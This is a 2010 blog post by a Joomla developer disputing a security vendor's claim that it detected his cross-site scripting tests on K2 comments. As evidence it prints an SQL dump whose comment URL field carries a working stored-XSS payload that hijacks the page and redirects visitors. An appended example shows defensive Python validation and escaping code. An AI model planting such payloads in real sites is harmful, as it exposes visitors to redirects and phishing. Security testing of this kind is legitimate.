Thursday, 23 December 2010 11:16
Jeff, I hate to argue with your response, but I'll say the same thing publicly that I told you privately: SecureLive did NOT detect the failed tests either time I ran them. I understand you employ scanning on your remote server instead of each individual client, and if you have updated your signatures and scanning technology to detect these attacks, then these tests have served their purpose - but I find it quite dishonest of you to make the claims you have after knowingly failing some of these tests twice.

For example, you claim to have detected Test 2, while my test database for SecureLive clearly shows this was not the case for either the initial test OR the requested retest:

--
-- Dumping data for table `jos_k2_comments`
--

INSERT INTO `jos_k2_comments` (`id`, `itemID`, `userID`, `userName`, `commentDate`, `commentText`, `commentEmail`, `commentURL`, `published`) VALUES
(1, 45, 0, 'test', '2010-12-13 23:11:35', 'haxed haha tooooooooooo shooooooooooooort', ' This e-mail address is being protected from spambots. You need JavaScript enabled to view it ', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1),
(2, 44, 0, 'jeff', '2010-12-14 01:11:15', 'haha haxxed', ' This e-mail address is being protected from spambots. You need JavaScript enabled to view it ', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1);

Furthermore, there is no confusion as to how any solution "detects" attacks - if the above code sent me on my way to jeffchannell.com, IT FAILED. This has nothing to do with "did it send a 40* error or not," because that was not the point - if the script ran unaltered (as it did during the tests) it was marked as failure.
In the example of Test 2, not only was the unaltered script saved to the database and thus executed, but SecureLive's detection system was absolutely silent - no notifications, no IP banning, nothing.
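
Added example, not part of the comment above and not code from K2 or SecureLive: a Python sketch of the server-side check and output escaping that keep a `commentURL` value like the one in the dump from leaving its attribute. It assumes the value is rendered inside a double-quoted `href`; the function names and the sample rows are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Characters that can close a quoted HTML attribute or begin a new attribute or tag.
ATTRIBUTE_BREAKERS = set('"\'<>` \t\r\n')

def is_safe_comment_url(url: str) -> bool:
    """Accept only absolute http(s) URLs with a host and no attribute-breaking characters."""
    if not url or any(ch in ATTRIBUTE_BREAKERS for ch in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)

def render_comment_link(name: str, url: str) -> str:
    """Link the commenter name only when the URL validates; escape every value on output."""
    safe_name = html.escape(name, quote=True)
    if not is_safe_comment_url(url):
        return safe_name  # drop the link, keep the escaped name
    return '<a rel="nofollow" href="{}">{}</a>'.format(
        html.escape(url, quote=True), safe_name)

def audit_rows(rows):
    """Return the ids of stored rows whose URL fails validation (what a retest should flag)."""
    return [row_id for row_id, _name, url in rows if not is_safe_comment_url(url)]

# Constructed sample rows: (id, userName, commentURL). Row 1 has the same shape as the
# value in the dump (quote, extra attributes), with a harmless handler body.
SAMPLE_ROWS = [
    (1, "test", 'http://" style="position:absolute" onmouseover="void(0)'),
    (2, "alice", "https://example.org/blog"),
    (3, "bob", "javascript:void(0)"),
]

if __name__ == "__main__":
    print("rows failing validation:", audit_rows(SAMPLE_ROWS))
    for _id, name, url in SAMPLE_ROWS:
        print(render_comment_link(name, url))
```

Running `audit_rows` over an existing comments table is a quick way to find rows that were stored before validation was in place.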
 

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
